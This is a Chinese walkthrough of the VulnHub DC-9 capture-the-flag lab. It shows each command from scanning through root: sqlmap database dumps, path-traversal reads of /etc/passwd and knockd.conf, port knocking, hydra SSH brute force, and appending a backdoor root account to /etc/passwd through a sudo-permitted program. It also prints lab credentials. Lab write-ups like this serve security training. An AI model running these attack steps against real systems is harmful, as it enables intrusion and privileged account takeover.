今天实践的是vulnhub的DC-9镜像，

下载地址，https://download.vulnhub.com/dc/DC-9.zip，

用virtualbox导入成功，

做地址扫描，sudo netdiscover -r 192.168.0.0/24，

获取到靶机地址192.168.0.114，

继续做端口扫描，sudo nmap -sS -sV -T5 -A -p- 192.168.0.114，

获取到靶机有80端口的http服务和22端口的ssh服务，

注意到ssh服务是被过滤的，猜测有端口敲门的情况，

浏览器访问，http://192.168.0.114，在search.php页面发现输入点，

在burpsuite中进行访问，保存请求报文到文件req.txt，

用sqlmap进行数据库暴破，sqlmap -r req.txt --dbs --batch，

获取到Staff和users两个数据库，

继续对Staff数据库进行暴破，

sqlmap -r req.txt -D Staff --dump-all --batch，

获取到admin的密码hash，

在线查到密码明文transorbital1，

继续对users数据库进行暴破，

sqlmap -r req.txt -D users --dump-all --batch，

获取到一堆用户名密码分别保存到user.txt和pass.txt，

浏览器访问http://192.168.0.114/manage.php，

用admin/transorbital1登录，

验证有文件包含漏洞，http://192.168.0.114/welcome.php?file=../../../../../../../etc/passwd，

继续查看敲门的配置，http://192.168.0.114/welcome.php?file=../../../../../../../etc/knockd.conf，

kali攻击机上安装敲门软件，sudo apt install knockd，

敲门，knock 192.168.0.114 7469 8475 9842，

验证敲门成功，nmap -p22 192.168.0.114，

用上面保存的用户名密码文件对ssh进行暴破，

hydra -L user.txt -P pass.txt 192.168.0.114 ssh，

用上面获取到的janitor/Ilovepeepee进行ssh登录，

ssh [email protected]，查找到一些新的密码，

把之前密码文件里没有的几个添加进去，

再次进行暴破，hydra -L user.txt -P pass.txt 192.168.0.114 ssh，

获取到新的用户密码fredf/B4-Tru3-001，

切换账户，su fredf，查看sudo权限，sudo -l，

发现/opt/devstuff/dist/test/test有root权限，

在外层文件夹/opt/devstuff发现个test.py，查看内容发现其完成的是把一个文件的内容追加到另一个文件，

准备一个添加root权限账户的脚本，

echo 'hacker:sa3tHJ3/KuYvI:0:0:hacker:/root:/bin/bash' >> /tmp/login，

进入cd /opt/devstuff/dist/test，

执行test程序，sudo ./test /tmp/login /etc/passwd，

切换到hacker账户，id确认是root，